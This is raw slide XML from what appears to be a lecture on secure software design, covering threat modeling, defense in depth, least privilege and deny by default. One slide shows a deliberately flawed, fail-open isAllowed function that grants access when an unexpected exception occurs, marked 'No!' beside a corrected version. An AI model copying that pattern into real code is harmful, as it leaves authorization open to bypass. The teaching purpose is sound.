              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="008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47119" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5124450" y="1355725"/>
            <a:ext cx="1797050" cy="966788"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -69389"/>
              <a:gd name="adj2" fmla="val 87204"/>
              <a:gd name="adj3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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>This isn’t new…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47120" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5954713" y="2184400"/>
            <a:ext cx="2419350" cy="1658938"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50116"/>
              <a:gd name="adj2" fmla="val -21861"/>
              <a:gd name="adj3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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>The message is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>security is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>an issue </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>in each phase!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47121" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6853238" y="3705225"/>
            <a:ext cx="1935162" cy="1174750"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -50167"/>
              <a:gd name="adj2" fmla="val -25148"/>
              <a:gd name="adj3" fmla="val 16667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82945" tIns="41473" rIns="82945" bIns="41473"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>Hopefully </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200"/>
              <a:t>it is obvious as well </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1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We are living in dangerous times</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6154" name="Picture 10" descr="C:\Sebastian\CERN\my presentations\future\av_industry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998730"/>
            <a:ext cx="6888765" cy="5166574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000504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Requirements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>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Results of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>threat modeling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>risk assessment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>what data and what resources should be protected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>against what</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>and from whom</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	should appear in system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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Architecture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110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modularity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: divide program into semi-independent parts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>small, well-defined interfaces to each module/function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isolation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: each part should work correctly </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>even if others fail (return wrong results, send requests with invalid arguments)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Defense in depth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>: build multiple layers of defense</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Simplicity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> (complex =&gt; insecure)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Define and respect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chain of trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>globally </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>about the whole system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49156" name="Picture 4" descr="MCj0233658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1350" y="4259263"/>
            <a:ext cx="1498600" cy="173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Things to avoid</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50179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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 9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3925" y="1050925"/>
            <a:ext cx="7751763" cy="53308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5" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="342016">
            <a:off x="230188" y="2857500"/>
            <a:ext cx="3055937" cy="1404938"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9933"/>
          </a:solidFill>
          <a:ln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en-GB" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Situations that can turn very wrong very quickly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mtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="194563" name="Picture 3" descr="fortress-beaumaris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8588" y="1052513"/>
            <a:ext cx="5537200" cy="439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94566" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6372225" y="981075"/>
            <a:ext cx="1690688" cy="4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45" tIns="41473" rIns="82945" bIns="41473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2200">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XIII century</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27658" name="Picture 10" descr="E:\Local\2010.06 Sec Day\securing\img\Defense in depth_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113213" y="2708275"/>
            <a:ext cx="4922837" cy="3654425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7308850" y="2276475"/>
            <a:ext cx="1720850" cy="4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45" tIns="41473" rIns="82945" bIns="41473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2200">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXI century</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51207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Multiple layers of defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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94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194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76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6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66" grpId="0"/>
      <p:bldP spid="11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Complexity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="1800225" y="-279400"/>
            <a:ext cx="5256213" cy="7777163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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System calls in Apache</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52228" name="Picture 5" descr="SysCallApach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1101725"/>
            <a:ext cx="7127875" cy="499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Complexity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="1800225" y="-279400"/>
            <a:ext cx="5256213" cy="7777163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/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>System calls in IIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53252" name="Picture 4" descr="SysCallII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1093788"/>
            <a:ext cx="7127875" cy="4999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Design – (some) golden rules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Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>security-sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>parts of your code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>small</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> principle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>program should run on the least privileged account possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>same for accessing databases, files etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>revoke a privilege when it is not needed anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Choose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safe defaults</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deny by default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Limit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resource consumption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fail gracefully </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Question again your assumptions, decisions etc.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Deny by default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552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1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> isAllowed(user):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  allowed = true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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 b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (!listedInFile(user, "admins.xml")): allowed = false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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 b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> IOError: allowed = false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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 b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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 b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> isAllowed(user):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  allowed = false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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 b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (listedInFile(user, "admins.xml")): allowed = true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	except</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: pass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="180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 b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49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285750" y="3571875"/>
            <a:ext cx="85725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ounded Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215063" y="2500313"/>
            <a:ext cx="2214562" cy="928687"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -218108"/>
              <a:gd name="adj2" fmla="val 96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What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMLError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is thrown instead? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4000500" y="1500188"/>
            <a:ext cx="1143000" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -175276"/>
              <a:gd name="adj2" fmla="val -24166"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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266700" indent="-266700" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangular Callout 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214813" y="4143375"/>
            <a:ext cx="1143000" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -175276"/>
              <a:gd name="adj2" fmla="val -24166"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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266700" indent="-266700" algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Yes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Further reading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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Ross Anderson</a:t>
            </a:r>
            <a:br>
